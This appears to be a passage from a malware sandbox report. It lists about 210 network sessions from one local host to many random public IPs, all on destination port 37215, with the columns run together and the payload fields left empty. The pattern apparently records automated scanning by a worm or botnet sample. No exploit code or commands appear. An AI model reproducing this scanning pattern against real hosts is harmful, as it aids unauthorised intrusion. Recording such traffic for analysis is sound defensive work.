                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10549192.168.2.134556241.214.229.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10550192.168.2.134041041.45.161.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10551192.168.2.1360472197.171.108.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10552192.168.2.133734441.63.92.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10553192.168.2.1337008197.17.147.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10554192.168.2.135073441.15.66.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10555192.168.2.1345774197.3.137.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10556192.168.2.1336120122.163.175.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10557192.168.2.1337670157.212.123.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10558192.168.2.134900441.171.168.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10559192.168.2.1346744197.198.60.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10560192.168.2.1338466197.10.192.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10561192.168.2.133960441.231.48.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10562192.168.2.135864041.183.198.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10563192.168.2.1355350157.167.6.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10564192.168.2.1350192157.159.197.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10565192.168.2.1333970197.94.141.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10566192.168.2.135080851.194.193.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10567192.168.2.134162420.24.26.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10568192.168.2.134960441.200.108.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10569192.168.2.1340940197.178.1.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10570192.168.2.1334742157.8.115.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10571192.168.2.134488841.13.204.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10572192.168.2.1339386157.99.170.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10573192.168.2.1351706197.71.146.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10574192.168.2.1348554157.125.44.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10575192.168.2.1345780157.85.82.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10576192.168.2.133755641.172.100.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10577192.168.2.134770841.146.69.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10578192.168.2.134319843.88.63.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10579192.168.2.1335074125.111.147.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10580192.168.2.135081041.76.157.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10581192.168.2.1346048197.0.226.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10582192.168.2.1354730197.188.241.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10583192.168.2.1345328157.248.196.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10584192.168.2.133367064.83.170.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10585192.168.2.1341952197.250.235.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10586192.168.2.1338056135.151.242.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10587192.168.2.1348348197.43.220.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10588192.168.2.134929641.220.182.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10589192.168.2.1333316157.254.66.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10590192.168.2.1351838197.45.186.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10591192.168.2.1333090197.81.9.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10592192.168.2.1352616197.157.97.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10593192.168.2.135603874.14.110.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10594192.168.2.134873441.130.31.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10595192.168.2.1360688197.180.199.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10596192.168.2.134085441.67.65.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10597192.168.2.1337028153.120.223.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10598192.168.2.133570841.73.254.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10599192.168.2.1341698197.216.246.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10600192.168.2.1333286189.95.153.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10601192.168.2.1340192157.64.222.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10602192.168.2.135666024.140.203.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10603192.168.2.1353018157.202.147.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10604192.168.2.1359846178.39.89.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10605192.168.2.1342704197.11.241.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10606192.168.2.1346252126.5.37.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10607192.168.2.1344608134.137.165.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10608192.168.2.1358688157.242.2.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10609192.168.2.1353924157.32.50.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10610192.168.2.1347234197.171.45.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10611192.168.2.135241041.42.86.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10612192.168.2.1335558140.250.194.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10613192.168.2.133887241.128.84.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10614192.168.2.1341908197.21.80.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10615192.168.2.134971871.225.6.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10616192.168.2.1336612197.131.126.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10617192.168.2.1350258197.254.244.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10618192.168.2.1337962110.243.51.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10619192.168.2.1358466197.190.161.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10620192.168.2.1334460197.38.254.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10621192.168.2.133508441.65.1.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10622192.168.2.1354244157.253.241.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10623192.168.2.133561841.16.106.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10624192.168.2.1346022157.59.0.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10625192.168.2.1336614157.10.66.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10626192.168.2.133833018.27.195.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10627192.168.2.1358018157.241.247.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10628192.168.2.135339041.93.126.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10629192.168.2.1340024157.104.48.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10630192.168.2.135091676.220.206.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10631192.168.2.1341880157.160.180.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10632192.168.2.134387841.230.56.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10633192.168.2.1333720157.46.204.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10634192.168.2.1340726197.28.136.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10635192.168.2.134318641.190.150.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10636192.168.2.133736441.15.151.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10637192.168.2.134243241.17.217.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10638192.168.2.1336982178.231.16.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10639192.168.2.135992836.227.27.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10640192.168.2.134544041.205.136.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10641192.168.2.1358640157.171.38.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10642192.168.2.134208641.154.162.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10643192.168.2.134830241.174.170.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10644192.168.2.1352792157.250.193.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10645192.168.2.1347116197.140.2.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10646192.168.2.1351992161.125.154.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10647192.168.2.1358470197.212.81.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10648192.168.2.133717841.74.185.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10649192.168.2.135395260.82.227.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10650192.168.2.1339022197.181.1.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10651192.168.2.1355228197.252.119.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10652192.168.2.134610887.8.116.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10653192.168.2.134815041.50.171.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10654192.168.2.134300641.172.102.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10655192.168.2.1344706197.99.127.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10656192.168.2.133708041.182.164.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10657192.168.2.1348950197.153.82.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10658192.168.2.136071641.84.231.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10659192.168.2.1353568197.126.11.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10660192.168.2.135885841.240.186.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10661192.168.2.1342318157.147.131.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10662192.168.2.1346584157.24.199.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10663192.168.2.1338134209.151.232.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10664192.168.2.135363670.11.222.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10665192.168.2.1336476157.222.84.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10666192.168.2.134323041.176.130.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10667192.168.2.1350202197.174.35.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10668192.168.2.1343132197.3.249.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10669192.168.2.1332908197.249.32.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10670192.168.2.1351514197.248.97.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10671192.168.2.1336038197.6.219.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10672192.168.2.1335004157.178.130.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10673192.168.2.1355182197.56.246.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10674192.168.2.135042424.82.159.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10675192.168.2.135610614.209.186.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10676192.168.2.1345850157.219.254.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10677192.168.2.1337694197.53.54.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10678192.168.2.13341182.47.151.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10679192.168.2.133882884.236.104.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10680192.168.2.134548641.81.7.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10681192.168.2.135106499.91.31.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10682192.168.2.1340810210.21.7.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10683192.168.2.1355730174.5.145.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10684192.168.2.134526441.103.92.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10685192.168.2.1345526164.122.220.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10686192.168.2.1344784197.143.241.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10687192.168.2.135108841.129.150.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10688192.168.2.1334270197.218.190.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10689192.168.2.1354606157.111.63.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10690192.168.2.135765041.175.144.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10691192.168.2.135307041.164.78.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10692192.168.2.1343720211.107.139.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10693192.168.2.1360836197.21.33.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10694192.168.2.133876441.138.151.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10695192.168.2.1342334157.44.76.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10696192.168.2.134449241.102.158.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10697192.168.2.1355532197.169.4.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10698192.168.2.1355118157.177.236.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10699192.168.2.1352196197.66.61.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10700192.168.2.1346834101.233.76.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10701192.168.2.133580241.136.223.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10702192.168.2.1334646120.179.132.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10703192.168.2.1355834197.103.175.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10704192.168.2.1353942157.225.0.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10705192.168.2.134133041.139.213.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10706192.168.2.1346136157.252.206.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10707192.168.2.1346350114.233.253.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10708192.168.2.1350974189.197.142.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10709192.168.2.133863041.121.36.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10710192.168.2.1350036197.36.218.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10711192.168.2.1348040197.0.184.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10712192.168.2.1353342157.95.131.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10713192.168.2.1334096168.159.18.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10714192.168.2.134973241.110.113.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10715192.168.2.134123841.51.193.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10716192.168.2.1348522157.62.205.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10717192.168.2.1360424157.70.148.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10718192.168.2.135300441.250.170.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10719192.168.2.133876020.135.211.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10720192.168.2.1355514157.41.138.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10721192.168.2.1358882157.125.162.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10722192.168.2.1359868191.175.122.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10723192.168.2.1333430193.161.214.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10724192.168.2.135384438.194.199.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10725192.168.2.1346342222.93.165.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10726192.168.2.1334044197.50.63.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10727192.168.2.134288435.77.198.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10728192.168.2.133902641.38.246.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10729192.168.2.1336250197.38.97.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10730192.168.2.134377041.119.214.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10731192.168.2.1351968157.154.159.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10732192.168.2.133786041.6.36.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10733192.168.2.1344872197.229.178.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10734192.168.2.1345328197.127.84.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10735192.168.2.1333780109.26.146.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10736192.168.2.1342624197.53.31.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10737192.168.2.133669441.166.154.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10738192.168.2.133871641.181.219.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10739192.168.2.1357778157.167.37.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10740192.168.2.1333934157.2.118.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10741192.168.2.1347708157.201.98.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10742192.168.2.1347944197.193.167.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10743192.168.2.1356248157.203.106.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10744192.168.2.1339198197.173.68.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10745192.168.2.1347044197.210.77.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10746192.168.2.134852441.174.108.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10747192.168.2.134735041.78.129.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10748192.168.2.134697441.40.10.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10749192.168.2.1345664157.175.228.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10750192.168.2.135734841.127.49.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10751192.168.2.1348876197.43.151.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10752192.168.2.1340066197.138.12.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10753192.168.2.134165441.122.9.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10754192.168.2.1336334157.126.214.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10755192.168.2.1348874178.63.197.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10756192.168.2.135379241.211.214.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10757192.168.2.1347928161.75.220.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
